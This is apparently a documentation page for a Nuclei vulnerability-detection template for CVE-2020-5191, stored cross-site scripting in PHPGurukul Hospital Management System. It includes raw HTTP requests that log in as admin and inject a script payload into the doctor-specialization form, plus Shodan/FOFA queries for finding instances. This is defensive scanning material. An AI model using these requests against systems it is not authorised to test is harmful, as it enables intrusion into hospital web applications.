PHPGurukul Hospital Management System - Cross-Site Scripting
ID: CVE-2020-5191
Severity: medium
Author: TenBird
Tags: cve2020,cve,hms,cms,xss,authenticated,edb,phpgurukul
Description
Section titled “Description”PHPGurukul Hospital Management System in PHP 4.0 contains multiple cross-site scripting vulnerabilities. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
YAML Source
Section titled “YAML Source”id: CVE-2020-5191
info: name: PHPGurukul Hospital Management System - Cross-Site Scripting author: TenBird severity: medium description: | PHPGurukul Hospital Management System in PHP 4.0 contains multiple cross-site scripting vulnerabilities. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/47841 - https://phpgurukul.com/hospital-management-system-in-php/ - https://nvd.nist.gov/vuln/detail/CVE-2020-5191 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-5191 cwe-id: CWE-79 epss-score: 0.00345 epss-percentile: 0.71585 cpe: cpe:2.3:a:phpgurukul:hospital_management_system:4.0:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: phpgurukul product: hospital_management_system shodan-query: http.html:"hospital management system" fofa-query: body="hospital management system" tags: cve2020,cve,hms,cms,xss,authenticated,edb,phpgurukul
http: - raw: - | POST /hospital/hms/admin/index.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}&submit=&submit= - | POST /hospital/hms/admin/doctor-specilization.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
doctorspecilization=%3C%2Ftd%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3Ctd%3E&submit=
host-redirects: true max-redirects: 2
matchers-condition: and matchers: - type: word part: body words: - '<td class="hidden-xs"></td><script>alert(document.domain);</script><td>'
- type: word part: header words: - text/html
- type: status status: - 200# digest: 4a0a00473045022100efe63532bbf1dfe66b0af292e524013b79f63a37e2d818daa2be29168e04671b02203c72f5f869568ae5462154dfdb9a8783fe2eb84661f8319310027e3626f3a13d:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-5191.yaml"